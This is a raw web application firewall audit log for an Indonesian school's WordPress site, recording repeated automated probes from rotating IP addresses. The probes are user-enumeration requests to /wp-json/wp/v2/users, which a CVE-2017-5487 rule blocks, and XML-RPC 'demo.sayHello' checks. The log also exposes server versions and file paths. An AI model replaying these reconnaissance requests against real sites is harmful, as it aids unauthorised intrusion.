[id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425909606259 2151 (- - -) Stopwatch2: 1747425909606259 2151; combined=973, p1=319, p2=628, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a0d8b03-Z-- --130a0d03-A-- [17/May/2025:03:05:13 +0700] aCeaedhEtho3ciA0weheRwAAAI0 103.236.140.4 54542 103.236.140.4 8181 --130a0d03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --130a0d03-C-- demo.sayHello --130a0d03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --130a0d03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425913551139 6246 (- - -) Stopwatch2: 1747425913551139 6246; combined=4574, p1=560, p2=3775, p3=37, p4=36, p5=97, sr=77, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --130a0d03-Z-- --aeee4c4b-A-- [17/May/2025:03:05:15 +0700] aCeae9hEtho3ciA0weheSQAAAJY 103.236.140.4 54548 103.236.140.4 8181 --aeee4c4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.39 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aeee4c4b-C-- demo.sayHello --aeee4c4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeee4c4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425915819489 4796 (- - -) Stopwatch2: 1747425915819489 4796; combined=3704, p1=414, p2=3088, p3=21, p4=24, p5=91, sr=64, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeee4c4b-Z-- --f24d2414-A-- [17/May/2025:03:05:20 +0700] aCeagNhEtho3ciA0weheSgAAAJg 103.236.140.4 54552 103.236.140.4 8181 --f24d2414-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f24d2414-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f24d2414-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425920924311 2625 (- - -) Stopwatch2: 1747425920924311 2625; combined=1077, p1=358, p2=695, p3=0, p4=0, p5=24, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f24d2414-Z-- --867bf62d-A-- [17/May/2025:03:05:24 +0700] aCeahNhEtho3ciA0weheTAAAAIM 103.236.140.4 54556 103.236.140.4 8181 --867bf62d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --867bf62d-C-- demo.sayHello --867bf62d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --867bf62d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425924248262 4440 (- - -) Stopwatch2: 1747425924248262 4440; combined=3497, p1=428, p2=2861, p3=33, p4=25, p5=89, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --867bf62d-Z-- --cc8a637d-A-- [17/May/2025:03:05:29 +0700] aCeaide6THFz1hsaJaLZPQAAAAE 103.236.140.4 54560 103.236.140.4 8181 --cc8a637d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cc8a637d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc8a637d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425929179497 15351 (- - -) Stopwatch2: 1747425929179497 15351; combined=27690, p1=329, p2=601, p3=0, p4=0, p5=13393, sr=69, sw=0, l=0, gc=13367 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc8a637d-Z-- --83dcf14f-A-- [17/May/2025:03:05:34 +0700] aCeajthEtho3ciA0weheTwAAAIk 103.236.140.4 54564 103.236.140.4 8181 --83dcf14f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.204 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --83dcf14f-C-- demo.sayHello --83dcf14f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --83dcf14f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425934861432 4789 (- - -) Stopwatch2: 1747425934861432 4789; combined=3649, p1=422, p2=3018, p3=27, p4=25, p5=91, sr=66, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83dcf14f-Z-- --6ebf4a75-A-- [17/May/2025:03:05:45 +0700] aCeamdhEtho3ciA0weheUQAAAIo 103.236.140.4 54568 103.236.140.4 8181 --6ebf4a75-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6ebf4a75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ebf4a75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425945122301 2868 (- - -) Stopwatch2: 1747425945122301 2868; combined=1283, p1=426, p2=826, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ebf4a75-Z-- --b177b434-A-- [17/May/2025:03:05:50 +0700] aCeanthEtho3ciA0weheUgAAAJA 103.236.140.4 54572 103.236.140.4 8181 --b177b434-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b177b434-C-- demo.sayHello --b177b434-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b177b434-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425950812570 5954 (- - -) Stopwatch2: 1747425950812570 5954; combined=4320, p1=556, p2=3538, p3=33, p4=36, p5=93, sr=83, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b177b434-Z-- --e5cc8d7f-A-- [17/May/2025:03:05:55 +0700] aCeao9hEtho3ciA0weheVQAAAI8 103.236.140.4 54586 103.236.140.4 8181 --e5cc8d7f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e5cc8d7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5cc8d7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425955771215 2778 (- - -) Stopwatch2: 1747425955771215 2778; combined=1273, p1=419, p2=824, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5cc8d7f-Z-- --8cb21b5f-A-- [17/May/2025:03:06:02 +0700] aCeaqthEtho3ciA0weheWAAAAIE 103.236.140.4 54592 103.236.140.4 8181 --8cb21b5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8cb21b5f-C-- demo.sayHello --8cb21b5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cb21b5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425962234231 5782 (- - -) Stopwatch2: 1747425962234231 5782; combined=4319, p1=548, p2=3546, p3=33, p4=38, p5=91, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cb21b5f-Z-- --dfef1253-A-- [17/May/2025:03:06:02 +0700] aCeaqkE0LfP59mkCzg42BgAAAMQ 103.236.140.4 54594 103.236.140.4 8181 --dfef1253-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dfef1253-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfef1253-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425962726677 14843 (- - -) Stopwatch2: 1747425962726677 14843; combined=25747, p1=413, p2=774, p3=0, p4=0, p5=12294, sr=78, sw=0, l=0, gc=12266 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfef1253-Z-- --7ed9fe1d-A-- [17/May/2025:03:06:09 +0700] aCeasdhEtho3ciA0weheWgAAAJQ 103.236.140.4 54600 103.236.140.4 8181 --7ed9fe1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7ed9fe1d-C-- demo.sayHello --7ed9fe1d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ed9fe1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425969084892 5817 (- - -) Stopwatch2: 1747425969084892 5817; combined=4232, p1=523, p2=3452, p3=28, p4=31, p5=128, sr=74, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ed9fe1d-Z-- --91e30b21-A-- [17/May/2025:03:06:17 +0700] aCeaudhEtho3ciA0weheXAAAAJg 103.236.140.4 54604 103.236.140.4 8181 --91e30b21-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --91e30b21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91e30b21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425977875804 2969 (- - -) Stopwatch2: 1747425977875804 2969; combined=1246, p1=451, p2=767, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91e30b21-Z-- --3fd2586c-A-- [17/May/2025:03:06:22 +0700] aCeavthEtho3ciA0weheXgAAAIM 103.236.140.4 54608 103.236.140.4 8181 --3fd2586c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fd2586c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fd2586c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425982455743 2029 (- - -) Stopwatch2: 1747425982455743 2029; combined=1014, p1=322, p2=665, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fd2586c-Z-- --d0d4e46b-A-- [17/May/2025:03:06:23 +0700] aCeav9e6THFz1hsaJaLZQQAAAAo 103.236.140.4 54610 103.236.140.4 8181 --d0d4e46b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d0d4e46b-C-- demo.sayHello --d0d4e46b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0d4e46b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425983400425 4958 (- - -) Stopwatch2: 1747425983400425 4958; combined=3761, p1=454, p2=3096, p3=24, p4=28, p5=92, sr=65, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0d4e46b-Z-- --d74ac949-A-- [17/May/2025:03:06:26 +0700] aCeawthEtho3ciA0weheYQAAAIk 103.236.140.4 54616 103.236.140.4 8181 --d74ac949-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d74ac949-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d74ac949-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425986728179 2122 (- - -) Stopwatch2: 1747425986728179 2122; combined=1025, p1=340, p2=654, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
